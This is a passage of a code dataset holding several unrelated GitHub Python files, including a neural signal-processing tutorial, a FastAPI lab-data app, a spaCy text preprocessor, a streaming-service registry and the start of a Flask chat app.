'sim_powerlaw' : {'exponent' : exp}}\n\n# Define the frequency range of interest for the analysis\nf_range = (1, 40)\n\n# Create the simulate time series\nsig = sim_combined(n_seconds, fs, components)\n\n###################################################################################################\n\n# Compute the power spectrum of the simulated signal\nfreqs, psd = compute_spectrum(sig, fs, nperseg=4*fs)\n\n# Trim the power spectrum to the frequency range of interest\nfreqs, psd = trim_spectrum(freqs, psd, f_range)\n\n# Plot the computed power spectrum\nplot_power_spectra(freqs, psd, title=\"Original Spectrum\")\n\n###################################################################################################\n#\n# In the above spectrum, we can see a pattern of power across all frequencies, which reflects\n# the 1/f activity, as well as a peak at 10 Hz, which represents the simulated oscillation.\n#\n\n###################################################################################################\n# IRASA\n# -----\n#\n# In the analysis of neural data, we may want to separate aperiodic and periodic components\n# of the data. Here, we explore using IRASA to do so.\n#\n# Algorithm Settings\n# ~~~~~~~~~~~~~~~~~~\n#\n# The main setting for IRASA are the resampling factors to use, set by the `hset` input.\n# Here, we will use default values, which are often sufficient.\n#\n# In the IRASA algorithm, the periodic component is calculated as the difference between\n# the full signal and the aperiodic component. It may be useful to apply a threshold in\n# this calculation, to restrict the periodic component to clear 'peaks' above the aperiodic.\n#\n# Here we will use a threshold value (`thresh`), such that regions of the periodic component\n# that are not above the threshold, calculates in terms of standard deviation of the power\n# spectrum, are left as part of the aperiodic component.\n#\n\n###################################################################################################\n\n# Compute the IRASA decomposition of the data\nfreqs, psd_aperiodic, psd_periodic = compute_irasa(sig, fs, f_range=f_range, thresh=1)\n\n###################################################################################################\n\n# Plot the isolated periodic and aperiodic components\nplot_power_spectra(freqs, [psd_aperiodic, psd_periodic],\n labels=['aperiodic', 'periodic'], title=\"IRASA Components\")\n\n###################################################################################################\n#\n# In the above components, we can see that the IRASA approach has given what appears to be\n# a very good separation of the spectral components from our original signal.\n#\n\n###################################################################################################\n# Decomposition\n# -------------\n#\n# Note that what IRASA returns is a decomposition of the power spectrum, separating\n# aperiodic and periodic components.\n#\n# To verify that this is what the algorithm does, we can check that the spectrum\n# of the full signal is the same as the combined periodic and aperiodic IRASA components.\n#\n\n###################################################################################################\n\n# Check that the sum of IRASA components is same as the PSD of the whole signal\npsd_irasa = psd_aperiodic + psd_periodic\nassert np.equal(psd_irasa, psd).all()\n\n###################################################################################################\n# Subsequent Analyses\n# -------------------\n#\n# One of the goals of separating the components may be to further analyze each component.\n#\n# For example, fitting the extracted aperiodic component can be done to measure the\n# properties of the aperiodic activity. Here, we can fit the IRASA extracted aperiodic\n# component to see if it matches what we simulated.\n#\n# Note that the fitting here actually measures the slope of the power spectrum, in log-log\n# space, which is equivalent to the 1/f exponent that was simulated.\n#\n\n###################################################################################################\n\n# Fit the aperiodic component of the IRASA results\nintercept, fit_sl = fit_irasa(freqs, psd_aperiodic)\nprint(\"Computed Exponent: {:1.2f}\".format(fit_sl))\nprint(\"Simulated Exponent: {:1.2f}\".format(exp))\n","repo_name":"neurodsp-tools/neurodsp","sub_path":"tutorials/aperiodic/plot_IRASA.py","file_name":"plot_IRASA.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"76"} +{"seq_id":"74581386165","text":"# combine multiple pickle files into a single one\n\nimport pickle\nimport sys\n\n\noutput_name = sys.argv[1]\ninput_names = sys.argv[2:]\n\nif output_name in [\"-h\", \"--help\"]:\n print(\"Usage: combine_pkls.py [output_name] [input_file1] [input_file2] ...\")\n exit()\n\ncombined_result = None\nfor idx, input_file in enumerate(input_names):\n with open(input_file, \"rb\") as f:\n data = pickle.load(f)\n if idx==0:\n combined_result = data\n if type(data) is list:\n data_type = \"list\"\n elif type(data) is dict:\n data_type = \"dict\"\n else:\n if data_type == \"list\":\n combined_result.extend(data)\n elif data_type == \"dict\":\n combined_result.update(data)\n \nwith open(output_name, \"wb\") as f:\n pickle.dump(combined_result, f)\n ","repo_name":"THGLab/iShiftML","sub_path":"dataset/dataset_process_scripts/combine_pkls.py","file_name":"combine_pkls.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13961126170","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras_custom_layers import ArgMax\n\nfrom keras import backend as K\nimport os\n\n# log2(M) bits to encode\nM = 2\n# One complex channel needs two real outputs\nn_channel = 2\n\n# Define network structure\nfrom_channel = Input(shape=(n_channel,),name='input')\ninner_layer = Dense(M, activation='relu')(from_channel)\ninner_layer = Dense(M, activation='softmax')(inner_layer)\noutput_bits = ArgMax()(inner_layer)\n\ndecoder = Model(from_channel, output_bits)\n# We need an extra identity in tensorflow for the output placeholder\ntf.identity(output_bits, name='output')\nprint(decoder.summary())\n\n# Export directory\nexport_dir = os.path.dirname(os.path.realpath(__file__))\n# Load weights from Keras model\ndecoder.load_weights(export_dir + '/export/keras_weights_decoder.h5')\n# Now save as tensorflow model\nsess = K.get_session()\nsaver = tf.train.Saver()\n# Write metagraph model\nos.makedirs(export_dir + '/export/decoder', exist_ok=True)\nsaver.save(sess, export_dir + '/export/decoder/tf_model')\n# Write graph for tensorboard\ntf.summary.FileWriter(export_dir + '/export/decoder',sess.graph)\n","repo_name":"johschmitz/gr-tensorflow_cc","sub_path":"examples/save_decoder_tf.py","file_name":"save_decoder_tf.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"39156314526","text":"from a1 import *\nimport math\n\ndef findMirrorPoint(p,l):\n z1=2*l.a*(l.a*p.x+l.b*p.y+l.c)/(l.a**2+l.b**2)\n z2=2*l.b*(l.a*p.x+l.b*p.y+l.c)/(l.a**2+l.b**2)\n p.x=p.x-z1\n p.y=p.y-z2\n\ndef checkSides(p1,p2,l1,l2):\n \"\"\"\n Taking strictly greater case only,\n as particulars weren't mentioned in question.\n \"\"\"\n z1=2*l1.a*(l1.a*p1.x+l1.b*p1.y+l1.c)/(l1.a**2+l1.b**2)\n z2=2*l1.b*(l1.a*p1.x+l1.b*p1.y+l1.c)/(l1.a**2+l1.b**2)\n r1=p1.x-z1\n r2=p1.y-z2\n r=Point(r1,r2)\n return((l2.a*r.x+l2.b*r.y+l2.c)*(l2.a*p2.x+l2.b*p2.y+l2.c)>0)\n \ndef checkIntersection(c1,c2): \n d=math.sqrt((c1.centre_y-c2.centre_y)**2+(c1.centre_x-c2.centre_x)**2)\n return (((c1.radius+c2.radius)>d) and (d>c1.radius) and (d>c2.radius))\n\n\n \n \n \n \n","repo_name":"arora-ansh/CSE101_IIITD","sub_path":"Labs/Lab6/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14825923580","text":"my_dict={}\n\ndict={\n \"name\":\"ashish\",\n \"role\":\"cybersecurity\",\n \"city\":\"delhi\"\n}\n\nprint(dict.get(\"role\")) \n\nprint(dict.keys())\ndict.update({\"shdjk\":\"skjd\"})\nprint(dict)\n\nfor keys in dict.keys():\n print(keys)\n\nfor values in dict.values():\n print(values)\n\nfor keys,values in dict.items():\n print(keys,values)","repo_name":"ashishnagar47/Python","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14972079351","text":"import os\nfrom database import *\nimport pandas as pd\nfrom typing import List , Any\nfrom fastapi import FastAPI , Query , Form\nfrom fastapi import File, UploadFile\nfrom fastapi.responses import FileResponse , HTMLResponse\nfrom pydantic import BaseModel\nfrom math import pow\nfrom typing import List\n\nfrom analyze import *\nfrom crud import *\n\napp = FastAPI(\n title= \"School Project\"\n )\n\n\ndef find_value(index : str , tag_len: int , data : str , close_tag : str = \"$\"):\n\n i = index + tag_len\n value = \"\"\n while not data[i] == close_tag:\n value += data[i]\n i+=1\n if i >= len(data):\n break\n\n return value\n\ndef kappa(ref_dens : float , defu : float , cp : float):\n return ref_dens * defu * cp\n\ndef kappa_calc(data):\n\n data_dict = {\n 'REF_DENSITY' : None,\n 'SAMPLE_NAME' : None,\n 'Shot_number' : [],\n 'Temperature_lfa' : [],\n 'Diffusivity' : [],\n 'Std_dev' : [],\n 'Cp_calc' : [],\n 'Kappa' : []\n }\n \n try:\n data_dict[\"REF_DENSITY\"] = float(find_value(data.index(\"#Ref_density /(g/cm^3),\") , len(\"#Ref_density /(g/cm^3),\"), data , close_tag = \"\\\\\"))\n data_dict[\"SAMPLE_NAME\"] = find_value(data.index(\"#Sample,\") , len(\"#Sample,\"), data , close_tag = \"\\\\\")\n data = find_value(data.index(\"#Cp-calc./(J/g/K)\\\\r\\\\n\") , len(\"#Cp-calc./(J/g/K)\\\\r\\\\n\") , data)\n except:\n pass\n \n for row in data.split(\"\\\\r\\\\n\"):\n \n try:\n row = row.split(\",\")\n data_dict[\"Shot_number\"].append(row[0])\n data_dict[\"Temperature_lfa\"].append(float(row[1]) + 273.0) \n data_dict[\"Diffusivity\"].append(float(row[2])) \n data_dict[\"Std_dev\"].append(float(row[3])) \n data_dict[\"Cp_calc\"].append(float(row[4])) \n data_dict[\"Kappa\"].append(kappa(\n ref_dens = data_dict[\"REF_DENSITY\"],\n defu = float(row[2]),\n cp = float(row[4])\n )) \n except:\n pass\n \n return data_dict\n\n\n@app.get(\"/download-data\" , tags=[\"Data files\"])\nasync def download_file():\n cell_data_file_path = \"cell-data.csv\"\n df = pd.DataFrame(get_all_cell_data())\n df.to_csv(cell_data_file_path , index=False)\n\n \n return FileResponse(cell_data_file_path , media_type='application/octet-stream',filename=cell_data_file_path)\n \n@app.post(\"/itamar/raw-data-file\")\nasync def zt_file_analyzer(\n lfa_file: UploadFile = File(...),\n lsr_file: UploadFile = File(...),\n):\n\n data_dict = kappa_calc(str(lfa_file.file.read()))\n\n\n with open(lsr_file.filename, \"wb\") as binary_file:\n \n # Write bytes to file\n binary_file.write(lsr_file.file._file.read())\n \n df = pd.read_excel(lsr_file.filename)\n\n data_dict[\"Temperature_lsr\"] = [val + 273.0 for val in df[\"Temperature(°C)\"]]\n data_dict[\"Seebeck_cof\"] = [val for val in df[\"Seebeck coefficient(µV/K)\"]]\n data_dict[\"Resistivity\"] = [val * 10**5 for val in df[\"Resistivity(??m)\"]]\n \n\n\n kappa_func = scipy.interpolate.PchipInterpolator(data_dict[\"Temperature_lfa\"], data_dict[\"Kappa\"] , extrapolate=True)\n \n data_dict[\"ZT\"] = []\n data_dict[\"Power_Factor\"] = []\n data_dict[\"Kappa_Interp\"] = []\n for s , t , r in zip(data_dict[\"Seebeck_cof\"] , data_dict[\"Temperature_lsr\"] , data_dict[\"Resistivity\"]):\n data_dict[\"Kappa_Interp\"].append(kappa_func.__call__(t))\n data_dict[\"ZT\"].append(((s**2)*t)/(kappa_func.__call__(t)*r*pow(10,7)))\n data_dict[\"Power_Factor\"].append(pow(s , 2) / (r*pow(10,7)))\n\n del data_dict[\"REF_DENSITY\"]\n del data_dict[\"SAMPLE_NAME\"]\n\n\n max_len = 0\n for key in data_dict.keys():\n try:\n if len(data_dict[key]) > max_len:\n max_len = len(data_dict[key])\n except:\n pass\n\n\n\n for key in data_dict.keys():\n for i in range(max_len):\n try:\n if data_dict[key][i] == None:\n pass\n except:\n data_dict[key].append(\"\")\n \n if os.path.exists(lfa_file.filename):\n os.remove(lfa_file.filename)\n if os.path.exists(lsr_file.filename):\n os.remove(lsr_file.filename)\n\n df = pd.DataFrame.from_dict(data_dict)\n df.to_csv(\"data.csv\")\n\n return FileResponse(\"data.csv\" , media_type='application/octet-stream',filename=lfa_file.filename)\n\n@app.post(\"/upload-folder\" , tags=[\"Data files\"])\nasync def upload_batch_folder(file: UploadFile = File(...),):\n \n res = {\"Result\": \"OK\", \"filenames\": file.filename}\n if file.filename.lower().endswith(\"png\") or file.filename.lower().endswith(\"jpg\") or file.filename.lower().endswith(\"jpg\"):\n # update image info\n file_info = file.filename.split(\"/\")\n batch_name = file_info[0]\n batch_number = int(batch_name.split(\"_\")[1])\n encapsulation_status = file_info[1]\n filename = file_info[-1]\n update_cell_image_path(batch_number , filename.split(\".\")[0] , file.filename)\n\n if not file.filename.endswith(\"txt\"):\n return res\n if \"table\" in file.filename or \"results\" in file.filename:\n return res\n if \"all\" in file.filename:\n return res\n \n file_info = file.filename.split(\"/\")\n batch_name = file_info[0]\n batch_number = int(batch_name.split(\"_\")[1])\n encapsulation_status = file_info[1]\n filename = file_info[-1]\n\n if not (\"l\" in filename.lower() or \"d\" in filename.lower()):\n print(filename)\n filename = f'{filename.split(\".\")[0]}-L.{filename.split(\".\")[1]}'\n print(filename)\n\n\n cellarea = 0.09\n\n data = file.file.read().decode(\"utf-8\")\n\n try:\n data = get_IV_from_content(data=data)\n data = analyze_IV(I=data[\"I\"] , V=data[\"V\"] , cellarea=cellarea)\n except:\n return res\n\n\n update_cell_IV_measurement(\n fabrication_procedure_number = 0 , \n filename = filename , \n batch_number = batch_number,\n encapsulation_status = encapsulation_status,\n encapsulation_material = None ,\n cellarea = 0.09,\n\n Jsc = data[\"Jsc\"],\n Voc = data[\"Voc\"],\n FF = data[\"FF\"],\n Eff = data[\"Eff\"],\n Pmax = data[\"Pmax\"],\n Vmp = data[\"Vmp\"],\n Imp = data[\"Imp\"],\n )\n\n return res\n\n\n\n\n@app.put(\"/update-batch/config/{batch_number}\" , tags=[\"Batch\"])\nasync def update_batch_configurations(\n batch_number : int,\n fabrication_procedure : int = Query(1 , enum = [i+1 for i in range(9)]),\n encapsulation_procedure : int = Query(1 , enum = [i+1 for i in range(8)]),\n update_times : bool = False,\n fabrication_time : datetime = datetime.now(),\n encapsulation_time : datetime = datetime.now(),\n):\n \n return update_batch_params(\n batch_number = batch_number,\n fabrication_procedure = fabrication_procedure,\n encapsulation_procedure = encapsulation_procedure,\n update_times = update_times,\n fabrication_time = fabrication_time,\n encapsulation_time = encapsulation_time,\n )\n\n@app.delete(\"/batch/delete/{batch_number}\" , tags=[\"Batch\"])\nasync def delete_one_batch(\n batch_number : int,\n):\n\n return delete_batch(batch_number=batch_number)\n\n@app.get(\"/procedure/get-all\" , tags=[\"Procedures\"],)\nasync def get_all_procedures(\n procedure_type : str = Query(\"encapsulation\" , enum = (\"encapsulation\" , \"fabrication\"))\n):\n\n return get_procedures(\n procedure_type = procedure_type\n )\n\n@app.post(\"/fabrication-procedure/{id}\" , tags=[\"Procedures\"],)\nasync def create_fabrication_procedure(\n id : int,\n name : str,\n description : str,\n):\n\n return update_fabrication_procedure(\n id = id,\n name = name,\n description = description\n )\n\n@app.post(\"/encapsulation-procedure/{id}\" , tags=[\"Procedures\"],)\nasync def create_encapsulation_procedure(\n id : int,\n pressure : float,\n kapton_in_gb : bool,\n encapsulation_in_gb : bool,\n encapsulation_material : str = Query(analyze.encapsulation_types[0] , enum = analyze.encapsulation_types),\n name : str = None,\n):\n\n return update_encapsulation_procedure(\n id = id,\n name = name,\n pressure = pressure,\n kapton_in_gb = kapton_in_gb,\n encapsulation_in_gb = encapsulation_in_gb,\n encapsulation_material = encapsulation_material,\n )\n\n@app.get(\"/celldata/get-all\" , tags=[\"Cell data\"])\nasync def get_all_cells():\n return get_all_cell_data()\n\n# disply home page\n@app.get(\"/\" , tags=[\"stats\"])\ndef display_dashboard(\n\n):\n \n data = get_all_cell_data()\n \n batch_numbers_list , pixel_for_batch = get_pixels_in_batch(data)\n encapsulation_types_yield_data = get_encapsulations_yeild_numbers()\n \n\n content_replace = {\n\n \"encapsulation_types_list\" : str([\"\"] + encapsulation_types + [\"\"]),\n \"encapsulation_types_yield_data\" : str([0] + encapsulation_types_yield_data + [0]),\n\n \"batch_list\" : str(batch_numbers_list),\n \"num_of_pixels_in_batch\" : str(pixel_for_batch),\n\n # \"celldata_table\" : dict_to_html_table(data),\n # \"procedures_table\" : str(get_procedures(format=\"html-table\"))\n }\n\n\n with open(\"static/index.html\" , 'r') as f: \n html_content = f.read()\n for key in content_replace.keys():\n html_content = html_content.replace(\n key , content_replace[key]\n )\n\n return HTMLResponse(content=html_content, status_code=200)\n","repo_name":"ofryma/school_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12209624199","text":"import re\nimport numpy as np\nimport pandas as pd\nimport spacy\nimport Utils\nfrom sklearn.model_selection import train_test_split\n\n\nclass Preprocessor:\n \n def __init__(self, name, df, cache=True, test_size=0.3, random_state=42):\n '''\n Class used for text preprocessing\n If you don't have spaCy installed: https://spacy.io/usage\n '''\n self.name = name\n self.df = df\n self.cache = cache\n self.test_size = test_size\n self.random_state = random_state\n self.messy_texts = df['text']\n self.nlp = spacy.load('en_core_web_sm')\n self.stopwords = self.nlp.Defaults.stop_words\n self.regex = {\n \n # custom regex to add a space between sticking words (e.g. 'endStart')\n #'camel_case_space': re.compile('([a-z])([A-Z])'),\n \n # replace html with htmlregex\n 'html': re.compile(r'<[^>]+>'),\n \n # replace url with urlregex\n 'url': re.compile(r'((http:\\/\\/)[^ ]*|(https:\\/\\/)[^ ]*|(www\\.)[^ ]*)'),\n\n # replace @user with USER\n \"user\": re.compile(r'@[^\\s]+'),\n \n # replace #topic with topic (at least 3 chars)\n \"hashtag\": re.compile(r'#([^\\s]{3,})'),\n \n # replace heyyyy' with 'heyy'\n \"char_repetition\": re.compile(r'(.)\\1\\1+'),\n \n \"heart\": re.compile(r'<3'),\n\n \"happy_smile\": re.compile(r\"[8:=;]['`\\-]?[)d]+\"),\n \n \"sad_smile\": re.compile(r\"[8:=;]['`\\-]?\\(+\"),\n \n \"neutral_smile\": re.compile(r\"[8:=;]['`\\-]?[\\/|]\"),\n \n \"laugh_smile\": re.compile(r\"[8:=;]['`\\-]?[pD]+\"),\n \n # remove non-alphabetic characters\n 'non_alpha': re.compile('[^a-zA-Z]'),\n\n # custom regex to remove single characters (also at beginning)\n 'single_char': re.compile(r'(\\s|^).(?=\\s+)'),\n\n # regex to remove multiple spaces\n 'multi_space': re.compile(r'\\s\\s+')\n }\n\n \n def run(self):\n '''\n If available, read preprocessed.parquet.gzip from cache\n Ohterwise create preprocessed.parquet.gzip and write it to cache\n '''\n if self.cache:\n return Utils.parquet_caching(\n parquet_name = self.name + \"_preprocessed\",\n callback = self.run_nlp_pipeline\n )\n else:\n return self.run_nlp_pipeline() \n \n\n def lemmatize_and_remove_stopwords(self, text):\n '''\n We use spaCy to lemmatize our texts and remove stopwords.\n We skip pronouns which lemmatize '-PRON-' as well.\n '''\n doc = self.nlp(text)\n return ' '.join(token.lemma_ for token in doc if token.lemma_ != '-PRON-' and token.lemma_ not in self.stopwords)\n \n \n def get_factorized_sentiments(self):\n codes, uniques = self.df['sentiment'].factorize()\n return codes\n\n def run_nlp_pipeline(self):\n '''\n To generate a corpus of lemmatized documents we feed our text data\n through a nlp pipeline that performes lemmatization, removes stopwords\n and applies our regular expressions. \n '''\n processed_texts = []\n\n for messy_text in self.messy_texts:\n\n # text = self.regex['camel_case_space'].sub(r'\\1 \\2', messy_text)\n text = self.regex['html'].sub(' htmlregex ', messy_text)\n text = self.regex['url'].sub(' urlregex ', text)\n text = self.regex['user'].sub(' userregex ', text)\n text = self.regex['hashtag'].sub(r'\\1', text)\n text = self.regex['char_repetition'].sub(r'\\1\\1', text)\n text = self.regex['heart'].sub('heartregex', text)\n text = self.regex['happy_smile'].sub('happyregex', text)\n text = self.regex['sad_smile'].sub('sadregex', text)\n text = self.regex['neutral_smile'].sub('neutralregex', text)\n text = self.regex['laugh_smile'].sub('laughregex', text)\n text = self.lemmatize_and_remove_stopwords(text.lower())\n text = self.regex['non_alpha'].sub(' ', text)\n text = self.regex['single_char'].sub(' ', text)\n text = self.regex['multi_space'].sub(' ', text)\n text = text.strip()\n\n processed_texts.append(text)\n \n processed_df = self.df.copy()\n processed_df['text'] = processed_texts\n processed_df['sentiment'] = self.get_factorized_sentiments()\n\n return processed_df\n \n \n def split(self, Xy): \n X_train, X_test, y_train, y_test = train_test_split(\n Xy['text'], Xy['sentiment'], test_size = self.test_size, random_state = self.random_state\n )\n train_test_sets = {\n \"X_train\": X_train,\n \"X_test\": X_test,\n \"y_train\": y_train,\n \"y_test\": y_test,\n }\n return train_test_sets","repo_name":"saschageyer/sa-benchmark","sub_path":"Preprocessor.py","file_name":"Preprocessor.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13142540342","text":"# Exercício Python 098: Faça um programa que tenha uma função chamada contador(), que receba três parâmetros: início,\n# fim e passo. Seu programa tem que realizar três contagens através da função criada:\n# a) de 1 até 10, de 1 em 1 . b) de 10 até 0, de 2 em 2 , c) uma contagem personalizada\n\ndef contador(initial, final, pace):\n print(f'~' * 30)\n print(f'Contando de {initial} até {final} pulando de {pace} em {pace}.')\n if initial < final and pace < 0:\n print(f'Não é possível essa interação, ela precisa ser negativa.')\n return\n elif initial > final and pace > 0:\n print(f'Não é possível essa interação, ela precisa ser postiva ')\n return\n elif initial == final:\n print(f'Não é possível usar essa interação se o início {initial} e o fim {final} são iguais.')\n return\n elif pace == 0:\n print(f'Não é possível usar 0 como interação.')\n return\n if pace > 0:\n final += 1\n else:\n final -= 1\n\n for cont in range(initial, final, pace):\n print(cont, end=' ')\n print(f'FIM')\n\ncontador(1, 10, 1)\ncontador(10, 1, -2)\nprint(f'~' * 30)\nwhile True:\n i = int(input('Digite o início da contagem: '))\n f = int(input('Digite o final da contagem: '))\n p = int(input('Digite a interação: '))\n contador(i, f, p)\n sair = str(input('Deseja sair? [ S/N ] ')).upper().strip()\n while sair not in 'SN':\n sair = str(input('Para sair digite [ S/N ] ')).upper().strip()\n if sair == 'S':\n break\n","repo_name":"tuteixeira/python_exercises","sub_path":"exercise098.py","file_name":"exercise098.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"75120205044","text":"import sys\nimport re\nimport importlib.util\nimport sys\n\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nfrom utils.utilities import info, error\n\n\ndef _services():\n \"\"\"Dictionary of supported services\"\"\"\n\n services = Path(\"services\")\n\n supported_services = {\n \"iview.abc.net.au\": {\n \"name\": \"ABC\",\n \"alias\": \"ABC iView\",\n \"path\": services / \"abciview\" / \"abciview.py\",\n \"api\": services / \"abciview\" / \"api.yaml\",\n \"config\": services / \"abciview\" / \"config.yaml\",\n },\n \"www.bbc.co.uk\": {\n \"name\": \"BBC\",\n \"alias\": \"BBC iPlayer\",\n \"path\": services / \"bbciplayer\" / \"bbciplayer.py\",\n \"api\": services / \"bbciplayer\" / \"api.yaml\",\n \"config\": services / \"bbciplayer\" / \"config.yaml\",\n },\n \"www.channel4.com\": {\n \"name\": \"CHANNEL4\",\n \"alias\": \"ALL4\",\n \"path\": services / \"channel4\" / \"channel4.py\",\n \"api\": services / \"channel4\" / \"api.yaml\",\n \"config\": services / \"channel4\" / \"config.yaml\",\n },\n \"www.channel5.com\": {\n \"name\": \"CHANNEL5\",\n \"alias\": \"My5 TV\",\n \"path\": services / \"channel5\" / \"channel5.py\",\n \"api\": services / \"channel5\" / \"api.yaml\",\n \"config\": services / \"channel5\" / \"config.yaml\",\n },\n \"www.crackle.com\": {\n \"name\": \"CRACKLE\",\n \"alias\": \"CRACKLE\",\n \"path\": services / \"crackle\" / \"crackle.py\",\n \"api\": services / \"crackle\" / \"api.yaml\",\n \"config\": services / \"crackle\" / \"config.yaml\",\n },\n \"www.ctv.ca\": {\n \"name\": \"CTV\",\n \"alias\": \"CTV\",\n \"path\": services / \"ctv\" / \"ctv.py\",\n \"api\": services / \"ctv\" / \"api.yaml\",\n \"config\": services / \"ctv\" / \"config.yaml\",\n },\n \"gem.cbc.ca\": {\n \"name\": \"CBC\",\n \"alias\": \"CBC Gem\",\n \"path\": services / \"cbc\" / \"cbc.py\",\n \"api\": services / \"cbc\" / \"api.yaml\",\n \"config\": services / \"cbc\" / \"config.yaml\",\n },\n \"www.itv.com\": {\n \"name\": \"ITV\",\n \"alias\": \"ITVX\",\n \"path\": services / \"itv\" / \"itv.py\",\n \"api\": services / \"itv\" / \"api.yaml\",\n \"config\": services / \"itv\" / \"config.yaml\",\n },\n \"pluto.tv\": {\n \"name\": \"PLUTO\",\n \"alias\": \"PlutoTV\",\n \"path\": services / \"pluto\" / \"pluto.py\",\n \"api\": services / \"pluto\" / \"api.yaml\",\n \"config\": services / \"pluto\" / \"config.yaml\",\n },\n \"therokuchannel.roku.com\": {\n \"name\": \"ROKU\",\n \"alias\": \"The Roku Channel\",\n \"path\": services / \"roku\" / \"roku.py\",\n \"api\": services / \"roku\" / \"api.yaml\",\n \"config\": services / \"roku\" / \"config.yaml\",\n },\n \"player.stv.tv\": {\n \"name\": \"STV\",\n \"alias\": \"STV Player\",\n \"path\": services / \"stv\" / \"stv.py\",\n \"api\": services / \"stv\" / \"api.yaml\",\n \"config\": services / \"stv\" / \"config.yaml\",\n },\n \"tubitv.com\": {\n \"name\": \"TUBITV\",\n \"alias\": \"TubiTV\",\n \"path\": services / \"tubi\" / \"tubitv.py\",\n \"api\": services / \"tubi\" / \"api.yaml\",\n \"config\": services / \"tubi\" / \"config.yaml\",\n },\n \"uktvplay.co.uk\": {\n \"name\": \"UKTVPLAY\",\n \"alias\": \"UKTV Play\",\n \"path\": services / \"uktvplay\" / \"uktvplay.py\",\n \"api\": services / \"uktvplay\" / \"api.yaml\",\n \"config\": services / \"uktvplay\" / \"config.yaml\",\n },\n \"www.cwtv.com\": {\n \"name\": \"CW\",\n \"alias\": \"The CW\",\n \"path\": services / \"cwtv\" / \"cwtv.py\",\n \"api\": services / \"cwtv\" / \"api.yaml\",\n \"config\": services / \"cwtv\" / \"config.yaml\",\n },\n }\n\n return supported_services\n\n\ndef get_service(url: str):\n \"\"\"Parse URL and dynamically import any supported service\"\"\"\n\n supported = _services()\n\n find_service = next(\n (\n info\n for service, info in supported.items()\n if service == urlparse(url).netloc\n ),\n None,\n )\n\n if find_service is None:\n error(\"Service is not supported\")\n sys.exit(1)\n\n spec = importlib.util.spec_from_file_location(\n find_service[\"name\"], str(find_service[\"path\"])\n )\n service_module = importlib.util.module_from_spec(spec)\n sys.modules[find_service[\"name\"]] = service_module\n spec.loader.exec_module(service_module)\n srvc = getattr(service_module, find_service[\"name\"])\n api = find_service.get(\"api\")\n config = find_service.get(\"config\")\n info(find_service[\"alias\"])\n return srvc, api, config\n","repo_name":"stabbedbybrick/freevine","sub_path":"utils/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"76"} +{"seq_id":"71521437685","text":"import os\nimport requests\nimport datetime\n\nfrom flask import Flask, session, render_template, request, redirect, url_for, jsonify\nfrom flask_session import Session\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\n\n# Config flask app\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Global variables. A future improvement would be to store this data in a database instead of on server memory.\n# That way we would also make sure that the channel list and messages don't disappear between server resets.\nchannelList = []\nprivateChannelList = []\nbufferDict = {}\n\n\n# Index page\n@app.route(\"/\")\ndef index():\n\n # Check if the user session has a channel name stored, and redirect there if so.\n if session.get(\"channel\"):\n channelName = session.get(\"channel\")\n return redirect(f\"/channels/{channelName}\")\n\n # Determine what the unread messages badge shall display. badge() returns the number of unread conversations.\n if session.get('username') != None:\n badgeInfo = badge(session.get('username'))\n else:\n badgeInfo = 0\n\n # Render index template otherwise.\n return render_template(\"index.html\", channels = channelList, badge = badgeInfo)\n\n\n# Home page. When forced to go to index instead of redirecting to session channel.\n@app.route(\"/home\")\ndef home():\n # Determine what the unread messages badge shall display. badge() returns the number of unread conversations.\n if session.get('username') != None:\n badgeInfo = badge(session.get('username'))\n else:\n badgeInfo = 0\n\n # Return session channel to none and load index page.\n session[\"channel\"] = None\n return render_template(\"index.html\", channels = channelList, badge = badgeInfo)\n\n\n# Save username in session\n@app.route(\"/saveUsername\", methods=[\"POST\"])\ndef saveUser():\n username = request.form.get(\"username\")\n session[\"username\"] = username\n return jsonify({\"success\": True})\n\n\n# This route adds a channel to the channel list\n@app.route(\"/addChannel\", methods=[\"POST\"])\ndef addChannel():\n\n # Query for channel name\n channelName = request.form.get(\"channelName\")\n\n # Check if channel doesnt exit and create it\n if channelName not in channelList:\n\n # Update channel list\n channelList.append(channelName)\n\n # Create buffer dictionary with maximum storage of last 100 messages\n bufferDict[channelName] = RingBuffer(100)\n\n print(\"channel added:\", channelName)\n return jsonify({\"success\": True})\n\n else:\n return jsonify({\"success\": False})\n\n\n# This route returns the channel page if the channel exits, and home/index otherwise.\n@app.route(\"/channels/\")\ndef channel(channelName):\n # Determine what the unread messages badge shall display. badge() returns the number of unread conversations.\n if session.get('username') != None:\n badgeInfo = badge(session.get('username'))\n else:\n badgeInfo = 0\n\n # Check if channel exists and render channel template if it does.\n if channelName in channelList:\n messages = bufferDict[channelName].get()\n session[\"channel\"] = channelName\n username = session.get(\"username\")\n return render_template(\"channel.html\", channelName = channelName, messages = messages, username = username, badge = badgeInfo)\n\n # Return home/index otherwise.\n else:\n print(\"CHANNEL:\" 